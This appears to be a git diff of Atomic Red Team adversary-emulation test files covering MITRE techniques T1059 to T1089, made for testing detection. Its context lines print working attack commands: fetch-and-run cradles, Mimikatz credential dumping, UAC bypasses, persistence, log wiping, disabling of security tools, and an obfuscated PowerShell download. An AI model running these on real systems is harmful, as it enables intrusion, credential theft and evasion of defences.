bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
```
atomics/T1060/T1060.md
+4 -8
View File
@@ -42,8 +42,7 @@ Run Key Persistence
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
@@ -61,8 +60,7 @@ RunOnce Key Persistence
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
@@ -80,8 +78,7 @@ RunOnce Key Persistence via PowerShell
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
@@ -100,8 +97,7 @@ Add Shortcut To Startup via PowerShell
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
atomics/T1062/T1062.md
+1 -2
View File
@@ -24,8 +24,7 @@ Create a New-VM
| vm_name | Create a new VM. | string | testvm|
| file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
atomics/T1063/T1063.md
+4 -8
View File
@@ -29,8 +29,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
netsh.exe advfirewall firewall show all profiles
tasklist.exe
tasklist.exe | findstr /i virus
@@ -47,8 +46,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
@@ -63,8 +61,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
@@ -77,8 +74,7 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
fltmc.exe | findstr.exe 385201
```
<br/>
atomics/T1064/T1064.md
+1 -2
View File
@@ -19,8 +19,7 @@ Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
atomics/T1065/T1065.md
+2 -4
View File
@@ -23,8 +23,7 @@ Testing uncommonly used port utilizing PowerShell
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
test-netconnection -ComputerName #{domain} -port #{port}
```
<br/>
@@ -42,8 +41,7 @@ Testing uncommonly used port utilizing telnet.
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
telnet #{domain} #{port}
```
<br/>
atomics/T1069/T1069.md
+3 -6
View File
@@ -31,8 +31,7 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
dscacheutil -q group
dscl . -list /Groups
groups
@@ -46,8 +45,7 @@ Permission Groups Discovery for Windows
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net localgroup
net group /domain
```
@@ -65,8 +63,7 @@ Permission Groups Discovery utilizing PowerShell
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
get-localgroup
get-ADPrinicipalGroupMembership #{user} | select name
```
atomics/T1070/T1070.md
+5 -10
View File
@@ -44,8 +44,7 @@ Clear Windows Event Logs
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wevtutil cl #{log_name}
```
<br/>
@@ -57,8 +56,7 @@ Manages the update sequence number (USN) change journal, which provides a persis
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
fsutil usn deletejournal /D C:
```
<br/>
@@ -70,8 +68,7 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
@@ -89,8 +86,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
echo 0> /var/spool/mail/#{username}
```
<br/>
@@ -107,8 +103,7 @@ This test overwrites the specified log. This technique was used by threat actor
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
echo 0> #{log_path}
```
<br/>
atomics/T1071/T1071.md
+5 -10
View File
@@ -31,8 +31,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
@@ -53,8 +52,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -78,8 +76,7 @@ The intent of this test is to trigger threshold based detection on the number of
| query_type | DNS query type | string | TXT|
| query_volume | Number of DNS queries to send | integer | 1000|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
<br/>
@@ -102,8 +99,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
| c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20|
| runtime | Time in minutes to run the simulation | integer | 30|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
.\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
<br/>
@@ -123,8 +119,7 @@ The simulation involves sending DNS queries that gradually increase in length un
| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
| query_type | DNS query type | string | TXT|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
.\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
<br/>
atomics/T1074/T1074.md
+2 -4
View File
@@ -19,8 +19,7 @@ Utilize powershell to download discovery.bat and save to a local file
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
```
<br/>
@@ -32,8 +31,7 @@ Utilize curl to download discovery.sh and execute a basic information gathering
**Supported Platforms:** Linux, macOS
#### Run it with `bash`!
```
#### Run it with `bash`! ```
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
```
<br/>
atomics/T1075/T1075.md
+1 -2
View File
@@ -25,8 +25,7 @@ Note: must dump hashes first
| domain | domain | string | atomic.local|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
<br/>
atomics/T1076/T1076.md
+1 -2
View File
@@ -19,8 +19,7 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
atomics/T1077/T1077.md
+2 -4
View File
@@ -29,8 +29,7 @@ Connecting To Remote Shares
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
<br/>
@@ -49,8 +48,7 @@ Map Admin share utilizing PowerShell
| computer_name | Target Computer Name | String | Target|
| map_name | Mapped Drive Letter | String | g|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
<br/>
atomics/T1081/T1081.md
+4 -8
View File
@@ -23,8 +23,7 @@ It is possible to extract passwords from backups or saved virtual machines throu
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
python2 laZagne.py all
```
<br/>
@@ -41,8 +40,7 @@ Extracting credentials from files
|------|-------------|------|---------------|
| file_path | Path to search | String | /|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
grep -riP password #{file_path}
```
<br/>
@@ -54,8 +52,7 @@ Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
invoke-mimikittenz
mimikatz.exe
```
@@ -68,8 +65,7 @@ Extracting Credentials from Files
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
```
atomics/T1082/T1082.md
+5 -10
View File
@@ -31,8 +31,7 @@ Identify System Info
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
@@ -45,8 +44,7 @@ Identify System Info
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
systemsetup
system_profiler
ls -al /Applications
@@ -60,8 +58,7 @@ Identify System Info
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
@@ -77,8 +74,7 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
**Supported Platforms:** Linux
#### Run it with `bash`!
```
#### Run it with `bash`! ```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
@@ -97,8 +93,7 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
**Supported Platforms:** Linux
#### Run it with `bash`!
```
#### Run it with `bash`! ```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
atomics/T1083/T1083.md
+4 -8
View File
@@ -29,8 +29,7 @@ Find or discover files on the file system
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
@@ -49,8 +48,7 @@ Find or discover files on the file system
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
ls -recurse
get-childitem -recurse
gci -recurse
@@ -70,8 +68,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
file */* *>> ../files.txt
@@ -89,8 +86,7 @@ Find or discover files on the file system
**Supported Platforms:** macOS, Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
cat /etc/mtab > /tmp/loot.txt
find . -type f -iname *.pdf > /tmp/loot.txt
atomics/T1084/T1084.md
+2 -4
View File
@@ -25,8 +25,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
@@ -58,8 +57,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
atomics/T1085/T1085.md
+1 -2
View File
@@ -24,8 +24,7 @@ Test execution of a remote script using rundll32.exe
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
```
<br/>
atomics/T1086/T1086.md
+12 -24
View File
@@ -50,8 +50,7 @@ Download Mimikatz and dump credentials
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
<br/>
@@ -68,8 +67,7 @@ Download Bloodhound and run it
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
<br/>
@@ -82,8 +80,7 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
@@ -97,8 +94,7 @@ Run mimikatz via PsSendKeys
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
<br/>
@@ -112,8 +108,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
<br/>
@@ -133,8 +128,7 @@ Using PS 5.1, add a user via CLI
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
<br/>
@@ -153,8 +147,7 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
@@ -173,8 +166,7 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
<br/>
@@ -192,8 +184,7 @@ Powershell xml download request
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
<br/>
@@ -211,8 +202,7 @@ Powershell invoke mshta to download payload
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
<br/>
@@ -225,8 +215,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Powershell_ise as a Privileged Account
#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
@@ -239,8 +228,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
```
atomics/T1087/T1087.md
+11 -22
View File
@@ -54,8 +54,7 @@ Enumerate all accounts by copying /etc/passwd to another file
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cat /etc/passwd > #{output_file}
```
<br/>
@@ -72,8 +71,7 @@ xxx (requires root)
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cat /etc/sudoers > #{output_file}
```
<br/>
@@ -90,8 +88,7 @@ View accounts wtih UID 0
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
grep 'x:0:' /etc/passwd > #{output_file} - name: List opened files by user
```
<br/>
@@ -103,8 +100,7 @@ List opened files by user
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
<br/>
@@ -121,8 +117,7 @@ Show if a user account has ever logger in remotely
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
lastlog > #{output_file}
```
<br/>
@@ -134,8 +129,7 @@ Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
groups
id
```
@@ -148,8 +142,7 @@ Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
@@ -165,8 +158,7 @@ Enumerate all accounts
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net user
net user /domain
dir c:\Users\
@@ -183,8 +175,7 @@ Enumerate all accounts via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
net user
net user /domain
get-localuser
@@ -206,8 +197,7 @@ Enumerate logged on users
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
query user
```
<br/>
@@ -219,8 +209,7 @@ Enumerate logged on users via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
query user
```
<br/>
atomics/T1088/T1088.md
+4 -8
View File
@@ -34,8 +34,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
@@ -53,8 +52,7 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
@@ -73,8 +71,7 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
@@ -93,8 +90,7 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
atomics/T1089/T1089.md
+10 -20
View File
@@ -33,8 +33,7 @@ Disables the iptables firewall
**Supported Platforms:** Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service iptables stop
@@ -55,8 +54,7 @@ Disables syslog collection
**Supported Platforms:** Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
@@ -75,8 +73,7 @@ Disable the Cb Response service
**Supported Platforms:** Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
@@ -95,8 +92,7 @@ Disables SELinux enforcement
**Supported Platforms:** Linux
#### Run it with `sh`!
```
#### Run it with `sh`! ```
setenforce 0
```
<br/>
@@ -108,8 +104,7 @@ Disables Carbon Black Response
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
<br/>
@@ -121,8 +116,7 @@ Disables LittleSnitch
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
<br/>
